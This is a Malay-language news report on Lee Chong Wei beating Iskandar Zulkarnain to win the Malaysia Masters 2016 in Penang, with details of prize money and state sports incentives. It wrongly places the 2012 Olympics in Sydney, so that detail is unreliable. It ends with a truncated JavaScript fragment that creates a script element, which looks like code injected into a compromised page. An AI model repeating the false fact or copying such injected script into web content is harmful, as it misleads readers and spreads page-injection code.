Hadiah AS$9,000, Chong Wei juara di gelanggang sendiri

Oleh : WATAWA NATAF ZULKIFLI

Gambar : DARWINA MOHD. DAUD

PANTAI JEREJAK – Jaguh badminton nombor satu negara, Datuk Lee Chong Wei yang menjuarai Kejohanan Badminton Victor Malaysia Master 2016 menerima hadiah sebanyak AS$9,000, manakala, AS$4,560 untuk pesaingnya yang mendapat tempat kedua, Iskandar Zulkarnain Zainudin.

Yang di-Pertua Negeri (TYT), Tun Dr. Abdul Rahman Abbas diiringi isteri, Toh Puan Majimor Shariff sendiri yang menyampaikan hadiah kejohanan tersebut.

Timbalan Ketua Menteri I, Dato’ Mohd. Rashid Hasnon dan Chong Eng (Exco Belia & Sukan, Pembangunan Wanita, Keluarga dan Masyarakat) turut menyaksikan majlis penghargaan kedua-dua atlet negara itu.

Difahamkan, kejohanan tersebut buat julung kalinya diadakan di negeri ini, yang berlangsung dekat Subterranean Penang International Convention and Exhibition Centre (SPICE). Lebih 5,000 peminat menyaksikan kejohanan yang dianjurkan secara bersama oleh Persekutuan Badminton Dunia (BWF) dan Persatuan Badminton Malaysia (BAM), serta disokong Majlis Sukan Negeri Pulau Pinang (MSNPP).

Chong Wei dalam tempoh 42 minit di gelanggang dilihat seakan mendapat saingan hebat daripada rakan senegara, Iskandar Zulkarnain, sebelum menghasilkan kemenangan 21-18 dan 21-11.

Selepas itu, Chong Wei melahirkan rasa yakin dengan kebolehan pencabarnya untuk bersama-sama membawa nama negara di pentas dunia pada masa depan.

“Saya lihat permainan Iskandar (Zulkarnain) bertambah bagus, namun beliau perlu tingkatkan lagi latihan fizikal serta mental untuk bersaing pada peringkat yang lebih tinggi kelak,” ujar beliau sambil menyatakan keterujaan apabila berkesempatan bersaing di gelanggang sendiri.

Chong Eng dalam kenyataan berasingan memberitahu, kejohanan tersebut bukan sahaja untuk mengetengahkan ‘bintang’ baru negara, bahkan demi merealisasikan hasrat Kerajaan Negeri untuk menjadikan Pulau Pinang dikenali sebagai bandar sukan di rantau ini.

Sejajar dengan impian itu, katanya, Kerajaan Negeri sendiri turut memberi insentif galakan di bawah Skim Kemenangan Sukan Kerajaan Negeri Pulau Pinang (SKIMAS) kepada atletatlet kelahiran Pulau Pinang yang cemerlang dalam pertandingan serta kejohanan peringkat kebangsaan dan antarabangsa.

Tambah beliau, Chong Wei merupakan antara atlet kelahiran Pulau Pinang yang beberapa kali menerima penghargaan langsung daripada Kerajaan Negeri, antaranya Anugerah Olahragawan Negeri selepas kejayaannya merangkul pingat perak dalam kejohanan antarabangsa Olimpik 2012 di Sydney, Australia.

var d=document;var s=d.createElement(‘script’);